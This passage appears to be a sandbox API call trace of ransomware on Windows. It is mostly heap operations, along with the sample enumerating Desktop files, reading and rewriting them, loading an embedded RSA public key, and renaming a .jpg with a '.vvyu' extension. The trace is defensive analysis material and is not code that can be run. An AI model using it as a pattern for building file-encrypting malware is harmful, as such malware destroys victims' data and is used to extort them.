0x2c37910 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27cc0 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39820 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0188.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0188.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.086] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x506b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x506b, lpOverlapped=0x0) returned 1 [0188.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.087] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5070, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.087] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.089] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.089] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.089] CloseHandle (hObject=0x584) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0188.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.091] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\5UvLwu6-nNEbg.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\5uvlwu6-nnebg.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\5UvLwu6-nNEbg.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\5uvlwu6-nnebg.jpg.vvyu")) returned 1 [0188.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.093] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.096] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47665360, ftCreationTime.dwHighDateTime=0x1d8a4d4, ftLastAccessTime.dwLowDateTime=0x475aa0b0, ftLastAccessTime.dwHighDateTime=0x1d8a52e, ftLastWriteTime.dwLowDateTime=0x475aa0b0, ftLastWriteTime.dwHighDateTime=0x1d8a52e, nFileSizeHigh=0x0, nFileSizeLow=0x1e85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hxqHaq.mkv", cAlternateFileName="")) returned 1 [0188.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0188.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.096] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\hxqHaq.mkv") returned=".mkv" [0188.096] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\hxqHaq.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\hxqhaq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.097] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=7813) returned 1 [0188.097] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.100] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1e5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.100] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.102] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.102] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1e85, lpOverlapped=0x0) returned 1 [0188.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.103] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.103] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.105] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.105] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.105] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.105] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.105] GetLastError () returned 0x0 [0188.105] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.105] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.106] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.106] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.106] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1e90) returned 0x2d43778 [0188.106] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.107] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39838 [0188.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.110] GetCurrentThreadId () returned 0x264 [0188.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38218 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.111] GetCurrentThreadId () returned 0x264 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.112] HeapFree (in: 